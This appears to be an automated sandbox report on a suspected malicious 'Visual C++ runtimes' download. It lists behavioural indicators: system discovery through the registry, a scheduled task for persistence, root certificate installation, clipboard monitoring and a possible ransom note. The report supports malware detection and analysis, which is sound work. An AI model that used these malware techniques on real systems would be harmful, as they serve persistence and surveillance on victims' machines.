\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2008 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3908 tasklist.exe 2264 tasklist.exe 3368 tasklist.exe 4868 tasklist.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe -
Modifies data under HKEY_USERS 49 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\31 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\28 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2D msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\32 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\35 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\37 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\33 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2C msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\32 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\23 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\24 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\37 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\24 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\33 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\36 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\34 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2f msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2F msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\30 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\38 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\39 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\30 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\31 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\3a msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\25 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2d msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\39 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\34 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\35 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\38 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\29 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\36 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 msiexec.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\Microsoft.VC90.ATL,version="9.0.30729.6161",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="amd64",type="win32" = 3600540043006c0046002e005f007400740035006200290038002100600024004b005a0046006d00460054005f00560043005f005200650064006900730074005f00410054004c005f007800360034003e0049005b00280055004d0049005b007600260036006a006d005f004f0071005400570060004100370000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1BAD2218D4DE6763BBA0AC63186945E3\SourceList msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\8A567BD6FA501A947AD1F646E53EEC14 msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\Microsoft.VC80.CRT,type="win32",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="amd64" = 2c006c0076006a0060006f002c0042002d00400050002e0059002e00430039007300560073003000560043005f005200650064006900730074003e0049004c005400540052005900320074004f005700650038004d006b0062004900640046007700550000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1BAD2218D4DE6763BBA0AC63186945E3\SourceList\Net\1 = "C:\\ProgramData\\Package Cache\\{8122DAB1-ED4D-3676-BB0A-CA368196543E}v12.0.40664\\packages\\vcRuntimeMinimum_x86\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_amd64,v14\Version = "14.38.33130" msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CE6380BC270BD863282B3D74B09F7570 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_x86,v12 msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\12B8D03ED28D112328CCF0A0D541598E msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4396FC35D89A48D31964CFE4FDD36514\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\AB297010A1550CA37AFEF0BA14653C28\Servicing_Key msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5040806F8AF9AAC49928419ED5A1D3CA\SourceList msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\Microsoft.VC80.MFC,type="win32",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e0021004d00210026005a005a006300300025006e00650038004d006b0062004900640046007700550000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1af2a8da7e60d0b429d7e6453b3d0182\SourceList\Net msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\CE6380BC270BD863282B3D74B09F7570 msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.30,bundle\Dependents VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BD77713C1C1591B4F90883FEC5D1C798\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}\ = "{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}" vcredist2013_x64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\FD25B1FDE88CFDD459B6E6A73023F764\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\FD25B1FDE88CFDD459B6E6A73023F764\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D169104D02A37CA349B316935DDB94A0\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{D401961D-3A20-3AC7-943B-6139D5BD490A}v12.0.40664\\packages\\vcRuntimeAdditional_x86\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1af2a8da7e60d0b429d7e6453b3d0182\ProductName = "Microsoft Visual C++ 2005 Redistributable (x64)" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1af2a8da7e60d0b429d7e6453b3d0182\SourceList\Media\4 = ";Microsoft Visual C++ 2005 Redistributable (x64) [Disk 1]" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1BAD2218D4DE6763BBA0AC63186945E3\SourceList\Media\1 = ";" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D169104D02A37CA349B316935DDB94A0\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D169104D02A37CA349B316935DDB94A0\SourceList msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\1af2a8da7e60d0b429d7e6453b3d0182 msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\Microsoft.VC90.CRT,version="9.0.30729.6161",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86",type="win32" = 5300530073002b005a0066007a00250039003500390027006e006a004d0066002c00350072002700460054005f00560043005f005200650064006900730074005f004300520054005f007800380036003e004b00520050005200400047006b006e005d0033003d002b004c00380047003600210061002e00490000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F1247AC1522AC9A43B023A96182A7B98\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D169104D02A37CA349B316935DDB94A0\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4396FC35D89A48D31964CFE4FDD36514\InstanceType = "0" msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\INSTALLER\DEPENDENCIES\MICROSOFT.VS.VC_RUNTIMEADDITIONALVSU_AMD64,V12\DEPENDENTS\{EF6B00EC-13E1-4C25-9064-B2F383CB8412} vcredist_x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeMinimumVSU_x86,v14\ = "{DF1B52DF-C88E-4DDF-956B-6E7A03327F46}" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F1247AC1522AC9A43B023A96182A7B98\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{1CA7421F-A225-4A9C-B320-A36981A2B789}v14.38.33130\\packages\\vcRuntimeMinimum_amd64\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BD77713C1C1591B4F90883FEC5D1C798\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\5 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4396FC35D89A48D31964CFE4FDD36514\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{53CF6934-A98D-3D84-9146-FC4EDF3D5641}v12.0.40664\\packages\\vcRuntimeMinimum_amd64\\" msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\INSTALLER\DEPENDENCIES\{EF6B00EC-13E1-4C25-9064-B2F383CB8412}\DEPENDENTS\{EF6B00EC-13E1-4C25-9064-B2F383CB8412} vcredist_x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\Microsoft.VS.VC_RuntimeAdditionalVSU_amd64,v12\DisplayName = "Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664" msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\15E8B87C56C0E773581D82F286F95E50 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B7EA9AC5CFE220F418DC23BA1E377C55\Provider msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\Microsoft.VC80.OpenMP,type="win32",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e0035006f00300068002c0070004d0076004e003d00650038004d006b0062004900640046007700550000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D169104D02A37CA349B316935DDB94A0\Servicing_Key msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7}\Dependents vcredist2013_x64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\679E80FBE29B63345BF612177149674C msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\B7EA9AC5CFE220F418DC23BA1E377C55\Language = "1033" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\policy.8.0.Microsoft.VC80.MFCLOC,type="win32-policy",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e006600720038005f006c0028006d0032004e004400650038004d006b0062004900640046007700550000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1926E8D15D0BCE53481466615F760A7F msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\CE6380BC270BD863282B3D74B09F7570\SourceList\Media msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\44DB0475D85BA123FA0CD6D35465DDC6 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.38,bundle\Dependents\{2cfeba4a-21f8-4ea7-9927-c5a5c6f13cc9} VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\FD25B1FDE88CFDD459B6E6A73023F764\ProductName = "Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.38.33130" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\FD25B1FDE88CFDD459B6E6A73023F764\Servicing_Key msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\BD77713C1C1591B4F90883FEC5D1C798\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\{042d26ef-3dbe-4c25-95d3-4c1b11b235a7} vcredist2013_x64.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\44DB0475D85BA123FA0CD6D35465DDC6 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\B7EA9AC5CFE220F418DC23BA1E377C55\Servicing_Key msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\Language = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\67D6ECF5CD5FBA732B8B22BAC8DE1B4D msiexec.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{61087a79-ac85-455c-934d-1fa22cc64f36}\Dependents vcredist_x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\FD25B1FDE88CFDD459B6E6A73023F764 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Patches\4D54076CED4F5BA32BBD3E5FAD1CD4C9\SourceList\LastUsedSource = "n;2;f:\\82d6eaa82f5cd7720dfb42\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\1BAD2218D4DE6763BBA0AC63186945E3\Assignment = "1" msiexec.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 startup_str_933.bat.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 startup_str_933.bat.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 startup_str_933.bat.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\Visual-C-Runtimes-All-in-One-Nov-2023.zip:Zone.Identifier firefox.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 4016 NOTEPAD.EXE 4020 NOTEPAD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 760 startup_str_933.bat.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3716 download_client_files.bat.exe 3716 download_client_files.bat.exe 3716 download_client_files.bat.exe 5520 powershell.exe 5520 powershell.exe 5520 powershell.exe 3884 powershell.exe 3884 powershell.exe 3884 powershell.exe 760 startup_str_933.bat.exe 760 startup_str_933.bat.exe 760 startup_str_933.bat.exe 5940 powershell.exe 5940 powershell.exe 5940 powershell.exe 3692 powershell.exe 3692 powershell.exe 3692 powershell.exe 4360 powershell.exe 4360 powershell.exe 4360 powershell.exe 5416 powershell.exe 5416 powershell.exe 5416 powershell.exe 760 startup_str_933.bat.exe 768 wmvwjn.bat.exe 768 wmvwjn.bat.exe 768 wmvwjn.bat.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 6044 powershell.exe 6044 powershell.exe 6044 powershell.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 2452 startup_str_806.bat.exe 2452 startup_str_806.bat.exe 2452 startup_str_806.bat.exe 3628 powershell.exe 3628 powershell.exe 3628 powershell.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 4520 startup_str_933.bat.exe 1632 taskmgr.exe 4520 startup_str_933.bat.exe 1632 taskmgr.exe 4520 startup_str_933.bat.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe 1632 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1632 taskmgr.exe 760 startup_str_933.bat.exe -
